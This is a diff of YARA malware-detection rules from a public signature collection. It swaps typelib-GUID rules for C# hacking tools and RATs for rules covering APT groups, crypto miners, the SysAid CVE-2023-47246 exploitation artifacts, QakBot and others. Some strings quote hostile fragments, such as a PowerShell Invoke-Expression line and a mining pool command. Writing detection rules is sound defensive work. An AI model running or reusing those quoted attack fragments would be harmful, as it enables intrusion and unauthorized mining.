-		id = "0576756e-26d5-5165-b621-917126a75a38"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/BlackVikingPro/Keylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2091-L2104"
+		description = "sphinx moth threat group file kerberos64.dll"
+		author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
+		id = "5a2487e4-cda4-5d45-9351-edd2b69c460a"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L87-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "490fb06375b32c70041754e8855cc1d26b76531d24a58bb0b719a998fdb809d6"
+		logic_hash = "13aeb72fcd0f5fd6e73464a90787c756c50569f9eae48945e4ff90d8f9073585"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii wide
+		$s0 = "KERBEROS64.dll" fullword ascii
+		$s1 = "zeSecurityDescriptor" fullword ascii
+		$s2 = "SpGetInfo" fullword ascii
+		$s3 = "SpShutdown" fullword ascii
+		$op0 = { 75 05 e8 6a c7 ff ff 48 8b 1d 47 d6 00 00 33 ff }
+		$op1 = { 48 89 05 0c 2b 01 00 c7 05 e2 29 01 00 09 04 00 }
+		$op2 = { 48 8d 3d e3 ee 00 00 ba 58 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of ( $s* ) and 1 of ( $op* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1337 : FILE
+rule SIGNATURE_BASE_Sphinx_Moth_Nvcplex : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4b79867d-761c-5aa8-bf8a-60caa50d8aa6"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/neofito/CVE-2020-1337"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2106-L2119"
+		description = "sphinx moth threat group file nvcplex.dat"
+		author = "Kudelski Security - Nagravision SA"
+		id = "dd1b4071-adf5-5d54-9b4c-877f0965bdc7"
+		date = "2015-08-06"
+		modified = "2023-12-05"
+		reference = "www.kudelskisecurity.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sphinx_moth.yar#L106-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05d557a3592845030880c3b87d8134565c2858db89218e1c38edbb025b945d72"
+		logic_hash = "2f851c0ab8c4a426b00addfbe0da7ceebb08e93014efcb11d64247d14fec909b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii wide
+		$s0 = "mshtaex.exe" fullword wide
+		$op0 = { 41 8b cc 44 89 6c 24 28 48 89 7c 24 20 ff 15 d3 }
+		$op1 = { 48 3b 0d ad 8f 00 00 74 05 e8 ba f5 ff ff 48 8b }
+		$op2 = { 8b ce e8 49 47 00 00 90 8b 43 04 89 05 93 f1 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 214KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplogger : FILE
+rule SIGNATURE_BASE_MAL_APT_Operation_Shadowhammer_Malsetup : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5cce395b-4f6f-5015-b45e-7eb79853296a"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/SharpLogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2121-L2134"
+		description = "Detects a malicious file used by BARIUM group in Operation ShadowHammer"
+		author = "Florian Roth (Nextron Systems)"
+		id = "000f840a-848d-5f82-84bf-70690efbd4de"
+		date = "2019-03-25"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/operation-shadowhammer/89992/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_shadowhammer.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9f63dc6bf41b6a062e80b6726c86bbeb7db68e319a78d1bd0187eef234a1c090"
-		score = 75
+		logic_hash = "dea31e401997b0aed1753754fd572a94df308229fccdf15ae6a907dcfd59b50a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac0711afee5a157d084251f3443a40965fc63c57955e3a241df866cfc7315223"
+		hash2 = "9acd43af36f2d38077258cb2ace42d6737b43be499367e90037f4605318325f8"
+		hash3 = "bca9583263f92c55ba191140668d8299ef6b760a1e940bddb0a7580ce68fef82"
+		hash4 = "c299b6dd210ab5779f3abd9d10544f9cae31cd5c6afc92c0fc16c8f43def7596"
+		hash5 = "6aedfef62e7a8ab7b8ab3ff57708a55afa1a2a6765f86d581bc99c738a68fc74"
+		hash6 = "cfbec77180bd67cceb2e17e64f8a8beec5e8875f47c41936b67a60093e07fcfd"
 
 	strings:
-		$typelibguid0lo = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii wide
+		$x1 = "\\AsusShellCode\\Release" ascii
+		$x2 = "\\AsusShellCode\\Debug"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Asyncrat_C_Sharp : FILE
+rule SIGNATURE_BASE_SUSP_LNX_SH_Cryptominer_Indicators_Dec20_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "858a079d-71e8-516e-a2a9-f0969edc758b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2136-L2159"
+		description = "Detects helper script used in a crypto miner campaign"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e376e0e1-1490-5ad4-8ca2-d28ca1c0b51a"
+		date = "2020-12-31"
+		modified = "2023-12-05"
+		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_crypto_miner.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac6319ecfbfc2ddb096b8674a9b494d9460181ebaa2b32ee337d46f6dd33f21d"
-		score = 75
+		logic_hash = "4acd1b77307dbf23f95f7a2024209bee714c6931182aff16455ea6b7e4a6f287"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3298dbd985c341d57e3219e80839ec5028585d0b0a737c994363443f4439d7a5"
 
 	strings:
-		$typelibguid0lo = "619b7612-dfea-442a-a927-d997f99c497b" ascii wide
-		$typelibguid1lo = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii wide
-		$typelibguid2lo = "37e20baf-3577-4cd9-bb39-18675854e255" ascii wide
-		$typelibguid3lo = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii wide
-		$typelibguid4lo = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii wide
-		$typelibguid5lo = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii wide
-		$typelibguid6lo = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii wide
-		$typelibguid7lo = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii wide
-		$typelibguid8lo = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii wide
-		$typelibguid9lo = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii wide
-		$typelibguid10lo = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii wide
+		$x1 = "miner running" fullword ascii
+		$x2 = "miner runing" fullword ascii
+		$x3 = " --donate-level 1 "
+		$x4 = " -o pool.minexmr.com:5555 " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Darkfender : FILE
+rule SIGNATURE_BASE_PUA_WIN_XMRIG_Cryptocoin_Miner_Dec20 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0aea5e05-7788-5581-8bcc-d2e75a291dd9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/0xyg3n/DarkFender"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2161-L2174"
+		description = "Detects XMRIG crypto coin miners"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4dfb04e9-fbba-5a6f-ad20-d805025d2d74"
+		date = "2020-12-31"
+		modified = "2023-12-05"
+		reference = "https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_crypto_miner.yar#L19-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2afa4ff5719cb5b3a53b45a880e08e2cac6df8bb1ff053ee290ad6b025f9a6b5"
+		logic_hash = "c39aee669a98bcc9d07821aef248096e45a6c54ab22b8b98c0a393b445f3934e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09"
 
 	strings:
-		$typelibguid0lo = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii wide
+		$x1 = "xmrig.exe" fullword wide
+		$x2 = "xmrig.com" fullword wide
+		$x3 = "* for x86, CRYPTOGAMS" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Minerdropper : FILE
+rule SIGNATURE_BASE_HKTL_Sentinelone_Remotepotato0_Privesc : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "607f72df-b0c1-53df-bf2c-592f55cbfcb7"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/DylanAlloy/MinerDropper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2194-L2208"
+		description = "Detects RemotePotato0 binary"
+		author = "SentinelOne"
+		id = "f6dffd6b-e794-5c4a-9700-5c2022168f44"
+		date = "2021-04-26"
+		modified = "2023-12-05"
+		reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_remote_potato0.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a604745a0d95c54be0d1b183486aad0751aee825574500fbff6380571565a18"
+		logic_hash = "f3a3a917908af6260f40b217f966750a095140abb6bf85cf3a728725bc16996f"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii wide
-		$typelibguid1lo = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii wide
+		$import1 = "CoGetInstanceFromIStorage"
+		$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
+		$meow_header = { 4d 45 4f 57 }
+		$clsid1 = "{11111111-2222-3333-4444-555555555555}" wide ascii
+		$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and $import1 and $istorage_clsid and $meow_header and 1 of ( $clsid* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdomainspray : FILE
+rule SIGNATURE_BASE_APT_PS1_Sysaid_EXPL_Forensicartifacts_Nov23_1 : SCRIPT CVE_2023_47246
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cffd3350-4a86-5035-ab15-adbc3ac2a0e9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/HunnicCyber/SharpDomainSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2210-L2223"
+		description = "Detects forensic artifacts found in attacks on SysAid on-prem software exploiting CVE-2023-47246"
+		author = "Florian Roth"
+		id = "df7997d3-9309-58b3-8cd7-de9fea36d3c7"
+		date = "2023-11-09"
+		modified = "2023-12-05"
+		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da8a964691758e8179199b5725b0811a5b37de964f6a5fa01d6adac286bc544a"
-		score = 75
+		logic_hash = "85efeea88961ca99b22004726d88efc46c748273b9a0b3be674f4cbb12cd3dd1"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "SCRIPT, CVE-2023-47246"
 
 	strings:
-		$typelibguid0lo = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii wide
+		$x1 = "if ($s -match '^(Sophos).*\\.exe\\s') {echo $s; $bp++;}" ascii wide
+		$x2 = "$s=$env:SehCore;$env:SehCore=\"\";Invoke-Expression $s;" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ispykeylogger : FILE
+rule SIGNATURE_BASE_MAL_Loader_Turtleloader_Nov23 : CVE_2023_47246 FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8607de67-b472-5afc-b2b9-cc758b5ec474"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/mwsrc/iSpyKeylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2225-L2241"
+		description = "Detects Tutle loader used in attacks against SysAid CVE-2023-47246"
+		author = "Florian Roth"
+		id = "c7b5d03d-52c4-59b4-ac69-55e532a21340"
+		date = "2023-11-09"
+		modified = "2023-12-05"
+		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L17-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c0b0a8d53efc5e922f73eec7550e6927f19aaef950921fde95b7bd651adeec7"
-		score = 75
+		logic_hash = "14a1636ed4dc3c897fefe53946e67339f91da9e2fbed2c99b9b4119dcc2649c0"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2023-47246, FILE"
+		hash1 = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d"
 
 	strings:
-		$typelibguid0lo = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii wide
-		$typelibguid1lo = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii wide
-		$typelibguid2lo = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii wide
-		$typelibguid3lo = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii wide
+		$s1 = "No key in args!" ascii fullword
+		$s2 = "Bad data file!" ascii fullword
+		$s3 = "Data file loaded. Running..." ascii
+		$op1 = { 48 8d 55 c8 4c 8d 3d ac 8f 00 00 45 33 c9 45 33 d2 4d 8b e7 44 21 0a 45 33 db 4c 8d 3d 16 ec ff ff }
+		$op2 = { 48 d3 e8 0f b6 c8 49 03 cb 49 81 c3 00 01 00 00 45 33 8c 8f a0 e4 00 00 41 83 fa 04 7c c7 41 ff c0 }
+		$op3 = { 48 83 c1 04 48 ff ca 89 41 1c 75 ef 03 f6 48 83 c3 20 48 ff cd 0f 85 77 ff ff ff }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Solarflare : FILE
+rule SIGNATURE_BASE_MAL_Grace_Dec22
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3645e14c-6025-59fa-a5a2-d8dacba8cd94"
-		date = "2020-12-15"
-		modified = "2025-08-15"
-		reference = "https://github.com/mubix/solarflare"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2243-L2256"
+		description = "Detects Grace (aka FlawedGrace and GraceWire) RAT"
+		author = "X__Junior"
+		id = "fc2214dc-f1e5-52d7-a9de-88709a03b04e"
+		date = "2022-12-13"
+		modified = "2023-12-05"
+		reference = "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L40-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9968c4f65672e98ec1ced26e2344e9b12141e3ea7e58be650d077089c9f6bd1c"
-		score = 75
+		logic_hash = "8276662dadfa2f8e07dd7882a60e55bd22ecf1f8f66a09940f16236598646560"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "a66df3454b8c13f1b92d8b2cf74f5bfcdedfbff41a5e4add62e15277d14dd169"
+		hash2 = "e113a8df3c4845365f924bacf10c00bcc5e17587a204b640852dafca6db20404"
 
 	strings:
-		$typelibguid0lo = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii wide
+		$sa1 = "Grace finalized, no more library calls allowed." ascii
+		$sa2 = "Socket forcibly closed due to no response to DISCONNECT signal from other side, worker id(%d)" ascii
+		$sa3 = "AVWireCleanupThread" ascii
+		$sa4 = "AVTunnelClientDirectIO" ascii
+		$sa5 = "AVGraceTunnelWriteThread" ascii
+		$sa6 = "AVGraceTunnelClientDirectIO" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Snaffler : FILE
+rule SIGNATURE_BASE_HKTL_Redmimicry_Agent
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4b9a8c5-e0d9-5c85-af81-05f6e0f52bff"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/SnaffCon/Snaffler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2258-L2272"
+		description = "matches the RedMimicry agent executable and payload"
+		author = "mirar@chaosmail.org"
+		id = "a4d4ec77-4a0d-5afd-9181-85433e8b5fda"
+		date = "2020-06-22"
+		modified = "2023-01-06"
+		reference = "https://redmimicry.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redmimicry.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a99f8012e45bbc7b689c49d2f6b5e86918b3984ce211fc4b459b6297d75c233a"
+		logic_hash = "645da2764ca911c4aae80b90622d2c61933dee929403858fc49f7bc0d44300c6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		sharing = "tlp:white"
 
 	strings:
-		$typelibguid0lo = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii wide
-		$typelibguid1lo = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii wide
+		$reg0 = "HKEY_CURRENT_USER\\" ascii
+		$reg1 = "HKEY_LOCAL_MACHINE\\" ascii
+		$reg2 = "HKEY_CURRENT_CONFIG\\" ascii
+		$reg3 = "HKEY_CLASSES_ROOT\\" ascii
+		$cmd0 = "C:\\Windows\\System32\\cmd.exe" ascii fullword
+		$lua0 = "client_recv" ascii fullword
+		$lua1 = "client_send" ascii fullword
+		$lua2 = "$LuaVersion: " ascii
+		$sym0 = "VirtualAllocEx" wide fullword
+		$sym1 = "kernel32.dll" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshares : FILE
+rule SIGNATURE_BASE_HKTL_Redmimicry_Winntiloader
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e96aa79b-1da2-5b0c-9ac2-b6e201e06ec6"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/SharpShares/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2274-L2287"
+		description = "matches the Winnti 'Cooper' loader version used for the RedMimicry breach emulation"
+		author = "mirar@chaosmail.org"
+		id = "a8be1377-faa0-560d-a12c-0369b1f91180"
+		date = "2020-06-22"
+		modified = "2023-01-10"
+		reference = "https://redmimicry.com"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redmimicry.yar#L28-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "09151f0ee360aaa74ebd0fe809ee45135705475a8559f78762ea80e261d173f3"
+		logic_hash = "d8ef457ac41a7c45cc7e97330bdd3de12eb3391c03d0a6a87ddc669c841c325d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		sharing = "tlp:white"
 
 	strings:
-		$typelibguid0lo = "fe9fdde5-3f38-4f14-8c64-c3328c215cf2" ascii wide
+		$s0 = "Cooper" ascii fullword
+		$s1 = "stone64.dll" ascii fullword
+		$decoding_loop = { 49 63 D0 43 8D 0C 01 41 FF C0 42 32 0C 1A 0F B6 C1 C0 E9 04 C0 E0 04 02 C1 42 88 04 1A 44 3B 03 72 DE }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpedrchecker : FILE
+rule SIGNATURE_BASE_MAL_Qakbotloader_Export_Section_Feb23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f7ff344e-f8ee-5c3a-bdd1-de3cae8e7dfb"
-		date = "2020-12-18"
-		modified = "2025-08-15"
-		reference = "https://github.com/PwnDexter/SharpEDRChecker"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2289-L2302"
+		description = "QakBot Export Selection"
+		author = "kevoreilly"
+		id = "cb86e9fb-a8d2-5285-aeda-622704399f8e"
+		date = "2023-02-17"
+		modified = "2023-12-05"
+		reference = "https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_qbot_feb23.yar#L22-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a5a192bb5aedf801465760fd362e0917c7a68c97058c82d0954ce44d3632c43"
+		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
+		logic_hash = "0e40cd6acdbfb17670b414bd6f2ecdf1ae26ddd6a5d85931973b98963a43aba8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		cape_options = "export=$export"
 
 	strings:
-		$typelibguid0lo = "bdfee233-3fed-42e5-aa64-492eb2ac7047" ascii wide
+		$export = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
+		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E8 [5-7] 74}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcliphistory : FILE
+
+rule SIGNATURE_BASE_SUSP_Unsigned_Googleupdate : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "89ca4717-a4ec-5371-8dc3-bdb9933384af"
-		date = "2020-12-21"
-		modified = "2025-08-15"
-		reference = "https://github.com/FSecureLABS/SharpClipHistory"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L2304-L2317"
+		description = "Detects suspicious unsigned GoogleUpdate.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2575b882-3526-5c42-9d50-83fb0b7df3f5"
+		date = "2019-08-05"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_google_anomaly.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18558f9c446847d2021c3f2a99315c490fc26b1c585dd8a7a0ba4470be8d1e45"
-		score = 75
+		logic_hash = "5e333ac773927e2ed1f6aa4d6bbcb63d67bcc8d18d732a84bb68cb503469b247"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354"
 
 	strings:
